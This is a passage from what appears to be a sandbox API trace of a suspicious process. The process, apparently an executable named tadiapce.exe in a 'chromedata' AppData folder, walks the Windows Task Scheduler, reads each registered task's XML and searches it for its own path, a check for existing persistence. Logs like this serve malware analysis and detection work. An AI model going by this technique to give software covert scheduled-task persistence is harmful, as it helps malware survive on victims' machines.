Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Application Popup'] and EventID=1801]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{190BA3F6-0205-4f46-B589-95C6822899D2}</ClassId>\r\n      <Data><![CDATA[PageNotZero]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.249] IUnknown:Release (This=0x55ff58) returned 0x0
	[0073.249] IRegisteredTaskCollection:get_Item (in: This=0x55fe60, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff58) returned 0x0
	[0073.249] IRegisteredTask:get_Name (in: This=0x55ff58, pName=0x128e3c | out: pName=0x128e3c*="DecompressionFailureDetector") returned 0x0
	[0073.249] IRegisteredTask:get_Xml (in: This=0x55ff58, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\memdiag.dll,-230)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\memdiag.dll,-231)</Source>\r\n    <URI>\\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\system32\\memdiag.dll,-232)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <EventTrigger id=\"9DC9BDAA-AA47-4bca-8848-B96A2A5E0197\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"&gt;&lt;Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"&gt;*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{190BA3F6-0205-4f46-B589-95C6822899D2}</ClassId>\r\n      <Data><![CDATA[Decompression]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.251] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\memdiag.dll,-230)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\memdiag.dll,-231)</Source>\r\n    <URI>\\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\system32\\memdiag.dll,-232)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <EventTrigger id=\"9DC9BDAA-AA47-4bca-8848-B96A2A5E0197\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"&gt;&lt;Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"&gt;*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{190BA3F6-0205-4f46-B589-95C6822899D2}</ClassId>\r\n      <Data><![CDATA[Decompression]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.252] IUnknown:Release (This=0x55ff58) returned 0x0
	[0073.252] IUnknown:Release (This=0x55fe60) returned 0x0
	[0073.252] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe60) returned 0x0
	[0073.252] ITaskFolderCollection:get_Count (in: This=0x55fe60, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.252] IUnknown:Release (This=0x55fe60) returned 0x0
	[0073.252] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.252] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xf, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.252] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe50) returned 0x0
	[0073.253] IRegisteredTaskCollection:get_Count (in: This=0x55fe50, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.253] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.253] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="HotStart") returned 0x0
	[0073.253] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)</Author>\r\n    <URI>Microsoft\\Windows\\MobilePC\\HotStart</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{06DA0625-9701-43da-BFD7-FBEEA2180A1E}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.255] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)</Author>\r\n    <URI>Microsoft\\Windows\\MobilePC\\HotStart</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{06DA0625-9701-43da-BFD7-FBEEA2180A1E}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.255] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.255] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.255] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe50) returned 0x0
	[0073.255] ITaskFolderCollection:get_Count (in: This=0x55fe50, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.255] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.255] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.255] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x10, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.255] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe48) returned 0x0
	[0073.256] IRegisteredTaskCollection:get_Count (in: This=0x55fe48, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.256] IRegisteredTaskCollection:get_Item (in: This=0x55fe48, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff20) returned 0x0
	[0073.256] IRegisteredTask:get_Name (in: This=0x55ff20, pName=0x128e3c | out: pName=0x128e3c*="LPRemove") returned 0x0
	[0073.256] IRegisteredTask:get_Xml (in: This=0x55ff20, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemRoot%\\System32\\lpremove.exe,-100)</Author>\r\n    <Source>$(@%systemRoot%\\System32\\lpremove.exe,-100)</Source>\r\n    <Description>$(@%systemRoot%\\System32\\lpremove.exe,-101)</Description>\r\n    <URI>Microsoft\\Windows\\MUI\\LPRemove</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger id=\"BootTrigger\">\r\n      <Delay>PT25M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT9H</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\lpremove.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.258] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemRoot%\\System32\\lpremove.exe,-100)</Author>\r\n    <Source>$(@%systemRoot%\\System32\\lpremove.exe,-100)</Source>\r\n    <Description>$(@%systemRoot%\\System32\\lpremove.exe,-101)</Description>\r\n    <URI>Microsoft\\Windows\\MUI\\LPRemove</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger id=\"BootTrigger\">\r\n      <Delay>PT25M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT9H</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\lpremove.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.259] IUnknown:Release (This=0x55ff20) returned 0x0
	[0073.259] IUnknown:Release (This=0x55fe48) returned 0x0
	[0073.259] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe48) returned 0x0
	[0073.260] ITaskFolderCollection:get_Count (in: This=0x55fe48, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.260] IUnknown:Release (This=0x55fe48) returned 0x0
	[0073.260] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.260] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x11, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.260] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe58) returned 0x0
	[0073.261] IRegisteredTaskCollection:get_Count (in: This=0x55fe58, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.261] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.261] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="SystemSoundsService") returned 0x0
	[0073.261] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2005-06-23T13:48:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)</Description>\r\n    <URI>Microsoft\\Windows\\Multimedia\\SystemSoundsService</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)</SecurityDescriptor>\r\n    <Source>$(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)</Source>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger />\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{2DEA658F-54C1-4227-AF9B-260AB5FC3543}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.263] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2005-06-23T13:48:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)</Description>\r\n    <URI>Microsoft\\Windows\\Multimedia\\SystemSoundsService</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)</SecurityDescriptor>\r\n    <Source>$(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)</Source>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger />\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{2DEA658F-54C1-4227-AF9B-260AB5FC3543}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.263] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.263] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.263] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe58) returned 0x0
	[0073.264] ITaskFolderCollection:get_Count (in: This=0x55fe58, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.264] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.264] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.264] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x12, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.264] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe50) returned 0x0
	[0073.264] IRegisteredTaskCollection:get_Count (in: This=0x55fe50, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.264] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.264] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="GatherNetworkInfo") returned 0x0
	[0073.265] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\nettrace.dll,-6910)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\nettrace.dll,-6911)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\nettrace.dll,-6912)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers />\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AnyUser\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AnyUser\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\gatherNetworkInfo.vbs</Command>\r\n      <WorkingDirectory>$(Arg1)</WorkingDirectory>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.266] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\nettrace.dll,-6910)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\nettrace.dll,-6911)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\nettrace.dll,-6912)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers />\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AnyUser\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AnyUser\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\gatherNetworkInfo.vbs</Command>\r\n      <WorkingDirectory>$(Arg1)</WorkingDirectory>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.267] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.267] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.267] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe50) returned 0x0
	[0073.267] ITaskFolderCollection:get_Count (in: This=0x55fe50, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.267] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.267] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.267] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x13, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.267] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe10) returned 0x0
	[0073.268] IRegisteredTaskCollection:get_Count (in: This=0x55fe10, pCount=0x128e30 | out: pCount=0x128e30*=0) returned 0x0
	[0073.268] IUnknown:Release (This=0x55fe10) returned 0x0
	[0073.268] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe10) returned 0x0
